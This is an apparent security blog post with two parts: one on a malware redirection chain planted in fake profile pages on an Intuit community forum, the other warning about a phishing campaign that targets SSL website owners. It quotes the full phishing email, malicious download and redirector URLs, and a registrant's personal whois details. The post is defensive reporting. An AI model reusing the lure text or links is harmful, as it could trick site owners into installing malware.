In basic scope and layout, this is nothing but yet another Russian malware distribution network. There are only a few things about it that deviate at all from the bog-standard run-of-the-mill compromises I see every day. The first is that the compromised site is owned by Intuit, which makes me very nervous about how seriously they take computer security.

The second is that the phony profile pages that redirect to malware hide some of the redirection steps behind TinyURL redirectors such as http://tinyurl.com/25avirua rather than relying 100% on their own redirector network (the TinyURL address redirects to a more conventional traffic redirector at http://arhetector.com/in.cgi?3&parameter=25aug, hosted by Worldstream.nl, which itself redirects to one of several sites such as stereotube.net or to http://tinyurl.com/stereotubeonline-boom-03, which redirects to http://stereotubeonline.com/xplays.php?id=48034 also hosted by Calpop.

The third is that the phony profile pages are pulling images from various real porn sites. For example,

http://community.quickbooks.co.uk/discussion/index.php?showuser=57939

is grabbing a picture from http://www.pink4free.com/blogs/wp-content/uploads/Pink4Free/Cecash/BigTits/AllFreePorn.gif. The Web site pink4free.com used to run a WordPress blog–it appears to be defunct now–but that WordPress blog still has an open image directory, and it contains advertising banners that the Russian hackers are drawing from in a bid to make the redirectors look more convincing.

When I go to my taxes next year, I don’t think I’ll use Intuit.

New computer virus scam targets Web site owners

There appears to be a new social engineering attack making the rounds of registered owners of Web sites that have SSL encryption certificates. I have a large number of Web sites, and so far I’ve only received emails to the technical address of sites which have SSL (security) certificates on them.

*** WARNING *** WARNING *** WARNING ***
This attack is currently live. DO NOT attempt to visit the URLS in this email if you do not know what you are doing!

The emails come from a phony From: address that is system@[thewebsitename.com]. Each email takes the form:

Attention!

On October 16, 2009 server upgrade will take place. Due to this the system may be offline for approximately half an hour.
The changes will concern security, reliability and performance of mail service and the system as a whole.
For compatibility of your browsers and mail clients with upgraded server software you should run SSl certificates update procedure.
This procedure is quite simple. All you have to do is just to click the link provided, to save the patch file and then to run it from your computer location. That’s all.

http://updates.[thenameofthewebsite.com].secure.ssl-datacontrol.com/ssl/id=712571016-[email address of registered contact]-patch257675.aspx

Thank you in advance for your attention to this matter and sorry for possible inconveniences.

System Administrator

So for example if you have a Web site called “theweaselstore.com” and your email address is “headweasel@theweaselstore.com” you may receive an email claiming to be from: system@theweaselstore.com, which tells you to click a link that looks like

http://updates.theweaselstore.com.secure.ssl-datacontrol.com/ssl/id=712571016-headweasel@theweaselstore.com-patch257675.aspx

Needless to say, the “patch” you download from this address is a computer virus.


This is one of the most sophisticated social engineering attempts I’ve seen to date. It seems to be going after a very specific group of people: people who own secure Web sites. The email itself is custom-tailored to look as much as possible like it comes from the system operators of the Web site in question, and the payload is delivered from a hostile server with a URL that has the address of the target site owner’s Web site embedded within it.

My suspicion, though I have not taken the time to analyze the payload, is that it is a key logger, and that the virus writers are attempting to get FTP credentials for the target Web site.

Being able to hack secure Web sites would offer the hacker a treasure trove of advantages. First, secure Web sites may contain customer information, transaction records, payment histories, and credit card numbers for the site’s customers.

Second, a phony bank or eBay site placed on a secure server is more convincing, because the phony site can be accessed using “https://” and will have the browser padlock indicating that the site is secure, which may help it to fool more people.

I’ve mentioned in this post how a Web address can be designed to fool people. It does not matter what’s in the address except for the part in front of the very first / character; so for example if you see a Web address that looks like

http://www.ebay.com.ws.eBayISAPI.dll.signin.ru/?SignIn&ru=12345

you are not on eBay. You can see where you are by looking at the part just before the first / which in this case is

http://www.ebay.com.ws.eBayISAPI.dll.signin.ru/?SignIn&ru=12345

a site called signin.ru in Russia.

Similarly, in the URLs in these hacker emails, the key part of the URL is

http://updates.theweaselstore.com.secure.ssl-datacontrol.com/ssl/id=712571016-headweasel@theweaselstore.com-patch257675.aspx

The computer virus is being distributed from a site called “ssl-datacontrol.com”.


ssl-datacontrol.com lives on servers belonging to an ISP called trouble-free.net, which is now a subsidiary of another ISP called interserver.net.

Trouble-free.net is an ISP I’m very familiar with. As near as I can tell, the “trouble” they are free of is meddling trouble such as legal issues, or those pesky problems you might have with having your spam or phish site shut down; they have, in my experience, a long and ignoble history of hosting viruses, spammers, pirate software sites (notorious credit card fraudster and pirate Art Schwartz has been hosted on trouble-free.net for over five years), and other criminal content.

The whois for ssl-datacontrol.com is, unsurprisingly, Russian:

whois ssl-datacontrol.com

Whois Server Version 2.0

Domain Name: SSL-DATACONTROL.COM
Registrar: ANO REGIONAL NETWORK INFORMATION CENTER DBA RU
Whois Server: whois.nic.ru
Referral URL: http://www.nic.ru
Name Server: NS1.CEDNS.RU
Name Server: NS2.CEDNS.RU
Status: clientTransferProhibited
Updated Date: 05-oct-2009
Creation Date: 05-oct-2009
Expiration Date: 05-oct-2010

>>> Last update of whois database: Mon, 12 Oct 2009 21:44:52 UTC <<< Registrant ID: HEIGAAS-RU Registrant Name: Elena V Zhuravlyova Registrant Organization: Elena V Zhuravlyova Registrant Street1: Orekhovyi boulevard Registrant Street1: d.31 kv.72 Registrant City: Moscow Registrant State: Moscow Registrant Postal Code: 115573 Registrant Country: RU Administrative, Technical Contact Contact ID: HEIGAAS-RU Contact Name: Elena V Zhuravlyova Contact Organization: Elena V Zhuravlyova Contact Street1: Orekhovyi boulevard Contact Street1: d.31 kv.72 Contact City: Moscow Contact State: Moscow Contact Postal Code: 115573 Contact Country: RU Contact Phone: +7 499 2678638 Contact E-mail: awoke@co5.ru Registrar: ANO Regional Network Information Center dba RU-CENTER


So in short what we have is a very sophisticated, highly directed attack targeted at Web site owners who are using SSL security certificates on their Web sites, being conducted through emails which create a custom From address and custom attack URL for each specific victim.

The same rules apply to this as to all emails:

– DO NOT believe the From: address of an email. Ever.

– DO NOT respond to ANY security alert, question, or prompt you receive in ANY email. Ever. No matter who it appears to be from.

– Learn to read Web site URLs. DO NOT trust any part of a URL except the part immediately in front of the first slash.